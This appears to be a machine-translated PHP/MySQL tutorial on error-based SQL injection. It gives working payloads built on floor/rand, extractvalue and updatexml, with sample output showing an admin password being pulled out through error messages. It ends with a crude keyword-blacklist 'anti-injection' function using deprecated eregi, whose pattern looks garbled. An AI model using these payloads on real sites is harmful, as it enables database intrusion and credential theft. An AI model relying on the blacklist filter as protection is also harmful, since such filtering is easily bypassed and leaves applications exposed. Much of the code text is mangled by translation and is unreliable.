1, through floor error
You can use the following code
The code is as follows |
Copy Code |
and select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0) *2)) x to Information_schema.tables Group by X); and (select COUNT (*) from (SELECT 1 Union SELECT NULL UNION SELECT! 1) x GROUP BY CONCAT (select table_name from Informati On_schema.tables limit 1), Floor (rand (0) *2)); |
Examples are as follows:
Start with the normal query:
The code is as follows |
Copy Code |
Mysql> SELECT * FROM article where id = 1; +----+-------+---------+ | ID | Title | Content | +----+-------+---------+ | 1 | Test | Do It | +----+-------+---------+ |
If the ID input exists, you can make an error with the following statement.
The code is as follows |
Copy Code |
Mysql> SELECT * FROM article WHERE id = 1 and (select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0) *2)) x from Information_schema.tables GROUP by X) a); ERROR 1062 (23000): Duplicate entry ' 5.1.33-community-log1 ' for key ' Group_key ' |
You can see a successful version of MySQL, and if you need to query for additional data, you can query by modifying the location statement of version ().
For example, we need to query the administrator username and password:
code is as follows |
copy code |
Method1: Mysql> SELECT * FROM article WHERE id = 1 and (select 1 from (SELECT COUNT (*), concat ((select pass from admin where id =1), Floor (rand (0) *2)) x from Information_schema.tables Group by x); ERROR 1062 (23000): Duplicate entry ' admin8881 ' for key ' Group_key ' Method2: Mysql> SELECT * FROM article WHERE id = 1 and (select COUNT (*) from (select 1 Union SELECT NULL UNION SELECT!) 1) x Group by concat (select pass from admin limit 1), Floor (rand (0) *2)); ERROR 1062 (23000): Duplicate entry ' admin8881 ' for key ' Group_key ' |
2, Extractvalue
The test statement is as follows
The code is as follows |
Copy Code |
and Extractvalue (1, concat (0X5C, (select table_name from information_schema.tables limit 1)); |
Actual test process
The code is as follows |
Copy Code |
Mysql> SELECT * FROM article WHERE id = 1 and extractvalue (1, concat (0x5c, (select pass from admin limit 1)); Error 1105 (HY000): XPATH syntax error: ' admin888 ' |
3, Updatexml
Test statement
The code is as follows |
Copy Code |
and 1= (Updatexml (1,concat 0x5e24, (select User ()), 0x5e24), 1) |
Actual test process
The code is as follows |
Copy Code |
Mysql> SELECT * FROM article WHERE id = 1 and 1= (Updatexml (1,concat (0x5e24, (select pass from admin limit 1), 0x5e24), 1) ; Error 1105 (HY000): XPATH syntax error: ' ^ $admin 888^$ ' |
One of the characteristics of the above method is that the query statement is very long and we can limit the input length, which can be effectively filtered but SQL injection, I would like to share an anti-SQL injection function.
1. Construction of functions
The code is as follows |
Copy Code |
/* Function name: Inject_check () Function: Detect the submitted value contains SQL injected characters, prevent injection, protect server security Parameters: $sql _STR: Submitted variables Return value: Returns the detection result, ture or False */ function Inject_check ($sql _str) { Return eregi (' select|insert|update|delete| ' | /*|*|.. /|. /|union|into|load_file|outfile ', $sql _str); To filter }
|
2. Use instances of functions
The code is as follows |
Copy Code |
<?php if (Inject_check ($_get[' id ')) { Exit (' You submit the data illegally, please check and resubmit! '); } Else { $id = $_get[' id ']; Working with data .......... } ?> |
More about SQL anti-injection indeed PHP tutorial we can refer to http://www.111cn.net/phper/phpanqn/37379.htm